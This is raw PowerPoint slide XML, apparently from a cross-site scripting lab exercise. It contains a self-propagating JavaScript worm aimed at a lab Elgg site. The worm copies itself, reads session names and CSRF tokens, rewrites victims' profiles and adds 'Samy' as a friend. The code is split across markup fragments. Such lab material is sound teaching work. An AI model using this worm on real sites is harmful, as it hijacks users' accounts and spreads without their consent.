            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BE31B8D-88A4-F8EF-4802-4D1AA535B8FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="557276" y="2108962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3" name="object 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64B83669-9DC9-CF5C-78D7-96C8AE86DBB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="373481" y="3327272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4" name="object 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32435D2B-F222-897B-A458-ECA75512E22E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1526794" y="4213352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5" name="object 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1FD9223-5F3D-ECCE-37C8-AAB1D2DFABFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4262373" y="5602630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6" name="object 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E0BF499-81BE-302C-A22F-70FE41C9B061}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8233409" y="47624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7" name="object 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CD32C87-6D95-C468-F381-C45CE70E2CC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3454" y="5287517"/>
            <a:ext cx="10655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8" name="object 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72181AC1-DEA8-A242-DB51-6516ADE0A0B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1976120" y="5237734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276177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519E607-A661-07DE-DF33-DFA55FE4DC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3724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Self-Propagating</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Worm</a:t>
            </a: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9239A878-38BF-EDF6-FF01-17A1FE0B9CDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2540" y="2090420"/>
            <a:ext cx="5268595" cy="82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99263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Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script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type="text/javascript"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id="worm"&gt;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window.onload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function(){</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="170815" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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spc="1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headerTag</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> =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"&lt;script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id=\"worm\"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type=\"text/javascript\"&gt;";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jsCode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document.getElementById("worm").innerHTML;</a:t>
            </a:r>
            <a:endParaRPr sz="105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</a:pP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tailTag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"&lt;/"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"script&gt;";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88C3C124-1D13-75CA-365B-992EB868EBBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="161036" y="3050794"/>
            <a:ext cx="510857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Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>//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Put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all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the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pieces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together,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and apply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the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URI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encoding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spc="1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wormCode</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> =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encodeURIComponent(headerTag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-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> jsCode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1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tailTag);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622B78C4-5837-37D4-48E4-B74E848E73C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="161036" y="3530853"/>
            <a:ext cx="3521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Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>//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Get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the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name, guid,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" spc="-10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> timestamp,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and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token.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89179E37-14C8-51FC-D2F1-DE190E8BFE40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955113" y="3690873"/>
            <a:ext cx="28860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"&amp;name="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elgg.session.user.name;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id="{4176C185-4DFD-38A3-1E95-C89EF7D4C1B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="161036" y="3690873"/>
            <a:ext cx="66230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spc="-10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name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spc="-8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guid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ts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CD32E915-0377-418F-9F2E-F3ADAEC16365}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955039" y="3850894"/>
            <a:ext cx="368109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"&amp;guid="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elgg.session.user.guid;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50" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=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"&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" u="sng" spc="60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elgg_ts="+elgg.security.token.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" u="sng" spc="60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elgg_ts;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6" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99AE6BE0-9B9B-BB7F-8236-BCF86238CC1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="161036" y="4171314"/>
            <a:ext cx="49517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Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>var token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10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> "&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" u="sng" spc="65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elgg_token="+elgg.security.token.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" u="sng" spc="6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elgg_token;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5D652233-60F2-8D6B-2A74-4BB53B9C00DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="161036" y="4491354"/>
            <a:ext cx="4870450" cy="1146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latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" b="1" spc="-2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Set</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" b="1" spc="-2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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" b="1" spc="-2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content</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" b="1" spc="-20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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" b="1" spc="-2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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" b="1" spc="-2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description</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" b="1" spc="-20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field</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" b="1" spc="-20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and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" b="1" spc="-2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access</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" b="1" spc="-10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level.</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="640080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="647700" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1050" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>var desc </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=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"&amp;description=Samy </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>is my hero" </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>+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wormCode</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" spc="-10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;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desc	+=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"&amp;accesslevel[description]=2";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5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" b="1" spc="-3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Send</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" b="1" spc="-30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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" b="1" spc="-30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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" b="1" spc="-20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POST</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" b="1" spc="-30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request</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="71120">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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spc="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sendurl="</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" spc="-10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.xsslabelgg.com/action/profile/edit</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1050" spc="-10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>";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content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token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ts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name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desc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guid;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8" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13581C9C-EA8D-435E-8C65-82937900E9BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5344795" y="2002027"/>
            <a:ext cx="4571365" cy="1535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885" marR="1352550" indent="-8382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ourier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Construct and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>send </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>the Ajax request </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-6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var samyGuid=59;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//FILL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IN</a:t>
            </a:r>
            <a:endParaRPr sz="11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if</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="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(elgg.session.user.guid!=samyGuid)</a:t>
            </a:r>
            <a:endParaRPr sz="11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263525">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>//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Create </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>and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send </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Ajax request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to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1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modify </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>profile</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="263525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var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Ajax=null;</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="263525" marR="508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Ajax = new XMLHttpRequest(); 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Ajax.open("POST",sendurl,true); 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Ajax.setRequestHeader("Host","</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.xsslabelgg.com</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>");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17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC3DF019-3699-3BE6-A6B1-7BB5B3F5AD46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5596254" y="4013961"/>
            <a:ext cx="4571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ourier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>//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Construct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the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="1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request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to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add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Samy </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>as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a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-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friend.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4" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABF08C02-013C-A391-C39E-0343C1B00431}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5596254" y="4181602"/>
            <a:ext cx="6337300" cy="120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ourier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sendurl=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="3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  <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>"http://www.xsslabelgg.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10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  <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>ction/friends/add?friend="+sa</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>myGuid</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="2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+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token</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> +</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="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ts;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var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Ajax=null;</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="2022475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Ajax=new XMLHttpRequest(); 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Ajax.open("GET",sendurl,true); </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> Ajax.setRequestHeader("Host","</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.xsslabelgg.com</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>");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ourier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Ajax.setRequestHeader("Content-Type",</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="3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"application/x-www-form-urlencoded");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Ajax.send();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5" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FFF8BAD-7A49-2DF8-93CE-CC89FD201EC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5260975" y="5523077"/>
            <a:ext cx="94996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}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&lt;/script&gt;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6" name="object 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0992C9F0-3FC7-6375-FC53-2C0948651E4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="184200" y="5853785"/>
            <a:ext cx="10466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2.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Fill</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t> in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t> javascript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10" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>worm.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sends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requests.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First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 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POST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modify user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profile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Second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GET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Samy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 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friend!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7" name="object 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A49E281-B2DF-AA1C-3724-E8620499B377}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9817861" y="2578861"/>
            <a:ext cx="330200" cy="321310"/>
            <a:chOff x="9817861" y="2578861"/>
            <a:chExt cx="330200" cy="321310"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58" name="object 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5E32879-4960-625B-A9E6-5C650708D21E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9830561" y="2591561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152400" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="104217" y="7534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62380" y="28517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29394" y="60514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7766" y="101096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="147827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7766" y="194559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29394" y="235141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62380" y="267138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104217" y="288121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152400" y="295655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200582" y="288121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242419" y="267138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275405" y="235141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297033" y="194559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304800" y="147827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297033" y="101096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275405" y="60514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242419" y="28517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200582" y="753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23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98FB03E5-3FA2-3C37-7120-10A04302ECDB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9830561" y="2591561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0" y="147827"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7766" y="101096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29394" y="60514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62380" y="28517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104217" y="7534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152400" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200582" y="7534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242419" y="28517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275405" y="60514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297033" y="101096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304800" y="147827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297033" y="194559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275405" y="235141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242419" y="267138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200582" y="288121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152400" y="295655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104217" y="288121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62380" y="267138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29394" y="235141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7766" y="194559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="14782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24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B07046A6-73C3-4585-E00B-9C0FE705E6ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9912857" y="257416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1" name="object 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DD23833-FA2E-4993-0939-144767BC91C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10122661" y="3874261"/>
            <a:ext cx="330200" cy="321310"/>
            <a:chOff x="10122661" y="3874261"/>
            <a:chExt cx="330200" cy="321310"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="object 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BCCD506-175B-A751-5E5A-CBF8A70DE9C1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10135361" y="3886961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152400" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="104217" y="7534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62380" y="28517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29394" y="60514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7766" y="101096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="147827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7766" y="194559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29394" y="235141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62380" y="267138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104217" y="288121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152400" y="295656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200582" y="288121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242419" y="267138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275405" y="235141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297033" y="194559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304800" y="147827"/>
                  </a:lnTo>
                  <a:lnTo>
